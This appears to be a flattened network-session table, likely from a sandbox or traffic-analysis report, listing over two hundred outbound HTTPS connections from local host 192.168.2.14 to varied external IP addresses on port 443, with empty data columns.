                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20190192.168.2.144234667.238.54.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20191192.168.2.1448498160.4.137.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20192192.168.2.1460088192.16.53.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20193192.168.2.1434392204.238.71.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20194192.168.2.145343097.153.179.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20195192.168.2.143352017.196.200.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20196192.168.2.1443304129.120.190.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20197192.168.2.146044896.181.128.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20198192.168.2.1455594137.250.214.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20199192.168.2.1444768174.235.180.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20200192.168.2.1444696192.233.65.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20201192.168.2.145035470.172.196.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20202192.168.2.1449456112.118.16.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20203192.168.2.1434630157.170.118.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20204192.168.2.145491059.83.32.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20205192.168.2.14520144.191.160.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20206192.168.2.144308693.196.35.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20207192.168.2.1450180199.125.195.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20208192.168.2.1450530186.138.89.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20209192.168.2.1443570143.125.73.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20210192.168.2.1454818123.160.92.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20211192.168.2.1458678199.247.197.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20212192.168.2.1442028104.206.24.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20213192.168.2.1457458169.217.156.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20214192.168.2.144592899.114.124.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20215192.168.2.1438610171.106.88.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20216192.168.2.1442498107.145.156.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20217192.168.2.1459810190.52.187.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20218192.168.2.143900472.227.9.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20219192.168.2.1446894213.195.229.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20220192.168.2.145253634.195.2.46443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20221192.168.2.1436914107.198.231.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20222192.168.2.143280066.17.2.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20223192.168.2.1458560113.195.68.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20224192.168.2.143506843.18.134.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20225192.168.2.1456806198.211.138.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20226192.168.2.145993286.11.200.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20227192.168.2.1453442156.225.229.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20228192.168.2.1434492223.145.149.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20229192.168.2.143659883.2.215.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20230192.168.2.1444104155.60.71.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20231192.168.2.1444134166.204.207.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20232192.168.2.144724042.242.106.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20233192.168.2.1456770172.74.86.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20234192.168.2.1449002120.172.191.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20235192.168.2.1453368173.14.186.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20236192.168.2.1434432112.55.210.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20237192.168.2.144123083.63.71.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20238192.168.2.1452742120.123.189.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20239192.168.2.1434948217.134.244.30443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20240192.168.2.145662236.226.230.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20241192.168.2.1433728171.194.179.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20242192.168.2.1433804216.36.241.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20243192.168.2.1443562118.50.37.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20244192.168.2.144130474.130.59.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20245192.168.2.1433748223.115.156.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20246192.168.2.1459198108.205.27.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20247192.168.2.14478528.245.242.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20248192.168.2.1433552155.166.169.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20249192.168.2.144249668.34.28.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20250192.168.2.1444802223.105.33.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20251192.168.2.145645081.211.230.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20252192.168.2.1436686124.186.243.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20253192.168.2.1436980154.255.142.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20254192.168.2.1438006180.226.120.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20255192.168.2.1454036179.193.6.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20256192.168.2.145529635.128.106.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20257192.168.2.1446796143.4.231.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20258192.168.2.145428872.67.116.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20259192.168.2.146063044.143.0.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20260192.168.2.145979443.247.161.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20261192.168.2.1459308114.35.52.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20262192.168.2.145236462.67.151.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20263192.168.2.144049057.89.90.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20264192.168.2.1437256108.140.254.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20265192.168.2.145758439.255.149.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20266192.168.2.143907025.133.119.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20267192.168.2.1453776117.236.223.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20268192.168.2.1446588192.54.63.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20269192.168.2.143755417.6.120.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20270192.168.2.1440714175.71.136.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20271192.168.2.1448770125.251.104.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20272192.168.2.1436358194.181.69.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20273192.168.2.1456126222.29.237.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20274192.168.2.143392639.238.104.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20275192.168.2.1445450185.5.253.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20276192.168.2.144451834.38.61.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20277192.168.2.143682267.97.72.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20278192.168.2.144877477.61.227.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20279192.168.2.1451330184.37.116.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20280192.168.2.1458186181.171.207.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20281192.168.2.143639884.135.86.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20282192.168.2.14429009.254.32.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20283192.168.2.1441222186.243.213.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20284192.168.2.1452006109.109.178.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20285192.168.2.1451256202.161.69.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20286192.168.2.1448244118.250.79.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20287192.168.2.143490448.122.102.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20288192.168.2.1435522141.89.179.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20289192.168.2.144795886.167.116.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20290192.168.2.1440742185.6.69.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20291192.168.2.1456836110.150.105.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20292192.168.2.1460248212.75.128.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20293192.168.2.144941677.5.197.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20294192.168.2.145967482.68.109.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20295192.168.2.145653088.208.22.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20296192.168.2.144660065.165.14.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20297192.168.2.1449894151.59.200.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20298192.168.2.1453612195.229.211.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20299192.168.2.1453194177.205.77.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20300192.168.2.146004425.53.145.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20301192.168.2.145985825.67.182.157443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20302192.168.2.143729449.88.222.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20303192.168.2.1438974187.237.31.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20304192.168.2.1459548135.231.118.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20305192.168.2.1458704101.243.197.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20306192.168.2.1445336201.107.15.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20307192.168.2.14500921.51.31.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20308192.168.2.1436314132.241.210.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20309192.168.2.145601060.116.119.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20310192.168.2.145134639.87.230.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20311192.168.2.14560468.228.80.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20312192.168.2.145429872.3.132.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20313192.168.2.145583879.124.132.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20314192.168.2.1441536119.97.108.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20315192.168.2.143335096.60.244.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20316192.168.2.1451952176.254.41.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20317192.168.2.143855854.157.125.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20318192.168.2.1449494113.106.162.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20319192.168.2.143556248.109.163.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20320192.168.2.1439188157.235.229.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20321192.168.2.145645268.7.90.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20322192.168.2.146075634.247.235.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20323192.168.2.1454612107.28.11.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20324192.168.2.145926471.33.92.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20325192.168.2.144848861.243.138.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20326192.168.2.143837071.3.75.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20327192.168.2.1451370194.108.32.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20328192.168.2.1454294193.81.18.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20329192.168.2.145978680.13.126.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20330192.168.2.1435364187.177.246.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20331192.168.2.145227454.229.73.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20332192.168.2.1459140106.21.245.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20333192.168.2.1448908182.12.23.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20334192.168.2.1441284206.178.250.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20335192.168.2.1438880155.77.151.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20336192.168.2.144665288.206.88.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20337192.168.2.1455400143.239.166.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20338192.168.2.145441643.116.178.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20339192.168.2.1447426163.200.154.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20340192.168.2.143925095.255.1.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20341192.168.2.143772665.248.112.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20342192.168.2.1453066110.210.24.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20343192.168.2.1457692152.79.140.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20344192.168.2.14430024.188.140.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20345192.168.2.143304085.25.215.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20346192.168.2.1460342194.34.33.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20347192.168.2.1442580201.69.251.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20348192.168.2.1456830135.183.202.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20349192.168.2.145094883.111.249.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20350192.168.2.1457188107.15.178.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20351192.168.2.144165623.200.21.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20352192.168.2.145593240.50.104.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20353192.168.2.1459852204.166.152.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20354192.168.2.145298827.105.233.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20355192.168.2.145923277.193.126.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20356192.168.2.14523625.221.45.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20357192.168.2.1435254171.58.22.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20358192.168.2.1454880118.65.189.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20359192.168.2.1432984170.225.28.157443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20360192.168.2.1451416126.129.65.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20361192.168.2.143681292.206.110.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20362192.168.2.145426247.100.185.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20363192.168.2.145712499.93.226.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20364192.168.2.1450682146.224.144.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20365192.168.2.1438040104.132.94.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20366192.168.2.1457188124.27.234.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20367192.168.2.1442880167.232.137.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20368192.168.2.145414664.148.168.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20369192.168.2.1447976110.196.248.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20370192.168.2.146096438.91.209.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20371192.168.2.1442176183.95.225.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20372192.168.2.144651660.123.45.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20373192.168.2.14411548.171.155.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20374192.168.2.1444894191.158.121.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20375192.168.2.1449342104.240.197.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20376192.168.2.145742294.16.241.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20377192.168.2.143715665.116.49.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20378192.168.2.1438990144.252.188.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20379192.168.2.1449558213.152.1.46443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20380192.168.2.1449970134.206.129.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20381192.168.2.1433592126.77.87.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20382192.168.2.1446016100.145.185.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20383192.168.2.144115693.111.55.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20384192.168.2.14597089.183.214.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20385192.168.2.1451090157.73.216.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20386192.168.2.1436464218.146.168.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20387192.168.2.145845039.186.191.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20388192.168.2.144555653.164.219.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20389192.168.2.145114057.100.1.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20390192.168.2.1454128143.249.160.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20391192.168.2.1438150156.123.100.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20392192.168.2.1442458169.200.69.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20393192.168.2.145909465.204.74.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20394192.168.2.145113683.149.172.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20395192.168.2.143517277.124.25.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20396192.168.2.144751241.165.248.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20397192.168.2.143989485.124.147.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20398192.168.2.1445940206.121.81.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20399192.168.2.144205685.91.17.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20400192.168.2.144280282.12.166.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20401192.168.2.143363059.26.71.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20402192.168.2.1436780118.85.4.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20403192.168.2.145040062.220.12.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20404192.168.2.143842865.115.81.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20405192.168.2.1456230188.227.2.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20406192.168.2.1436438131.72.214.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20407192.168.2.1457854217.236.74.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20408192.168.2.145853258.251.120.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20409192.168.2.1460240141.76.80.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20410192.168.2.145206417.85.221.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20411192.168.2.1435044141.97.86.157443
